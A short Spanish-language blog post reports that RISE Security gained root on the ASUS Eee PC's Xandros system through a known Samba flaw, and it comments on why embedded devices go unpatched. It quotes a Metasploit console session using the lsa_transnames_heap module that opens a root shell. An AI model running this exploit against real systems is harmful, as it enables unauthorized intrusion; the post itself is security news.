Leo hace escasos segundos que la gente de RISE Security acaban de hackear el sistema operativo que viene por defecto con los ASUS Eee. Resulta que el SO que viene presintalado en los portátiles es Xandros, que es una versión derivada de Corel Linux que a su vez proviene de Debian Linux. Parece ser que por defecto viene con una versión del demonio Samba con fallos conocidos y activado por defecto. Una vez que sabían eso, simplemente emplearon el framework metasploit, cargaron el exploit para esa versión de samba y consiguieron root en el sistema.
msf exploit(lsa_transnames_heap) > exploit [*] Started bind handler [*] Creating nop sled.... ... [*] Trying to exploit Samba with address 0x08415000... [*] Connecting to the SMB service... [*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ... [*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ... [*] Calling the vulnerable function... [+] Server did not respond, this is expected [*] Command shell session 1 opened (192.168.50.201:33694 -> 192.168.50.10:4444) msf exploit(lsa_transnames_heap) > sessions -i 1 [*] Starting interaction with 1... uname -a Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686 GNU/Linux id uid=0(root) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)
La noticia es muy reciente y no tengo forma de conformarlo así que tomad la información con cautela. No obstante, habiendo trabajado con sistemas embebidos, no me sorprende lo más mínimo. Suele ser una constante en todos estos tipos de sistemas, que resulta muy caro y difícil crear actualizaciones periódicas para cada actualización del software que incorpora el dispositivo. Esto es debido a que la compilación de muchos de estos paquetes de software es compleja y generalmente requiere que se parcheen las versiones de forma manual para acoplarlo al sistema empotrado. Esto consume mucho tiempo y recursos y por tanto los fabricantes deciden no actualizarlo tan a menudo y directamente no actualizarlos. No obstante, como dirían algunos: “nice hack!“